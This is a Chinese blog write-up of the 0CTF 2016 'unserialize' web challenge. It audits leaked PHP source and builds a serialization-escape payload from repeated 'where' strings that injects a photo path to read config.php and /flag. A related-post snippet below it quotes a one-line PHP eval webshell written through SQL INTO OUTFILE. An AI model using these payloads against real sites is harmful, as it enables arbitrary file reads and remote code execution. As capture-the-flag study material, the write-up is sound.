0ctf_2016_unserialize

最新推荐文章于 2023-06-01 15:03:00 发布
最新推荐文章于 2023-06-01 15:03:00 发布
阅读量2.8k 收藏 1
点赞数 1
文章标签: php 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/120856991
版权

打开环境
在这里插入图片描述
只有个登录框
应该存在源码泄露,直接试试访问www.zip
得到源码
直接自动代码审计
在这里插入图片描述

发现有疑似这些漏洞
但是没有找到我们的反序列化,因为题目就是反序列化
然后自己来审计一下
在profile.php中

$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));

有个unserialize反序列化和file_get_contents读文件
应该是反序列化逃逸,然后来控制photo达成我们读取文件
在updata.php中

if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));

这就是上传的一些限制
然后是class.php中的数据库查询有个过滤规则,这里刚刚好拿来逃逸利用

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}

然后在config.php中发现
在这里插入图片描述
所以我们要读取的文件应该就是这个了
思路理清就开始
先访问register.php创建一个用户
登录进去后直接bp抓包上传
正则用数组绕过

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

发现读取的config,php文件中无flag
请添加图片描述
那就试试读跟目录下的flag

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:5:"/flag";}

在这里插入图片描述
在这里插入图片描述
成功得到flag
希望这篇文章能够帮助你!

M1kael
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_POST['password']; if(strlen($username
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
ctf之php序列化,0ctf_2016_unserialize(php反序列化逃逸字符)
weixin_39769228的博客
04-01 1016
一.0ctf_2016_unserialize(php反序列化逃逸字符)1234知识点:* 代码审计* Unserialize* LFR通过源码,我们可以发现在config.php中的flag,这题意图已经很明显了,是要我们读取config.php文件的内容。1234567...
[0CTF 2016]piapiapia
SopRomeo的博客
04-17 248
测试sql注入一直没用,扫目录,扫到了www.zip备份文件 源码如下 去register.php注册,然后登陆,是一段文件上传 ,上传木马没用,看profile.php的源码 可见并不会返回文件路径,只会输出文件,但是有个file_get_content()函数和反序列化函数 这种函数一般特别具有诱惑力,我们看到upadate.php 有个serialize()序列化函数!!! 直接去...
0ctf_2016 _Web_unserialize
怪味巧克力的博客
07-09 2648
0x01 拿到题目第一件事是进行目录扫描,看看都有哪些目录,结果如下: 不少,首先有源码,我们直接下载下来,因为有源码去分析比什么都没有更容易分析出漏洞所在。 通过这个知道,它一共有这么几个页面,首页登录页面,注册页面,update更改信息页面,这几个页面是我们能够直接接触到的,那想必flag应该在另外几个页面中,稍后我们分析。先来看看网站页面都是什么样子。 登录页面: 注册页面: 更改信息页面需要我们先登录,那我们就先随便注册一个,然后进去看看 到这里,基本上几个页面要进行的基本操作我们知道
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6463
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
[CTFTraining] 0CTF 2016 Unserialize
ZXW_NUDT的博客
06-01 2438
[CTFTraining] 0CTF 2016 Unserialize
CTF Web_php_unserialize 详细解题过程
m0_63028223的博客
04-16 3123
打开靶场地址,我们看到是一个php代码 我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件 扫描可以得出该网站下的文件,我将它复制在记事本中 发现一个数据库网站 获取到账号为root密码为空 登录数据库,在SQL出编写一句话木马,并执行。 SELECT "<?php eval(@$_POST['pass']); ?>" INTO OUTFILE '/tmp/test1.php' 接下来我们使用中国蚁剑,链接我们所编写的木马, SELECT "&
CTF-web_php_serialize反序列化
Be Smart
02-24 802
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
【CTF | 攻防世界】unserialize3解题详析(php序列化反序列化实例讲解)
等风来
05-21 4420
在 PHP 中,可以使用 serialize() 函数将对象序列化为字符串,然后保存到文件或传输到其他应用程序中。在 PHP 中,可以使用 unserialize() 函数将序列化后的字符串还原为原始的对象或数据,然后进行处理。对象被序列化并存储为字符串后,如果再次反序列化该字符串并尝试重建相应的对象时,PHP 就会自动调用该对象的。则是将序列化后的数据重新转换为对象、数据结构或变量的过程,以便在程序中进行操作或处理。在反序列化对象时自动调用,用于初始化对象的属性等操作。的对象,该对象有一个属性。
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
0ctf_tctf_2018
05-16
0 CTF / TCTF 2018 0CTF / TCTF 2018决赛中的一些加密挑战
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 657
php序列化与反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化与反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unseriali
unserialize php ctf,CTF-WEB-XTCTF-Web_php_unserialize
weixin_34677379的博客
03-26 306
题目来源XTCTF-Web_php_unserialize题目考点:PHP代码审计、PHP正则、PHP序列化与反序列化解题思路题目源码class Demo {private $file = ‘index.php‘;public function __construct($file) {$this->file = $file;}function __destruct() {echo @high...
unserialize3与反序列化漏洞零基础详解
sGanYu
09-08 2737
反序列化漏洞(序列化←→反序列化) 什么是序列化(serialize) 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串 什么是反序列化(unserialize) 将字符串转换为状态信息
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值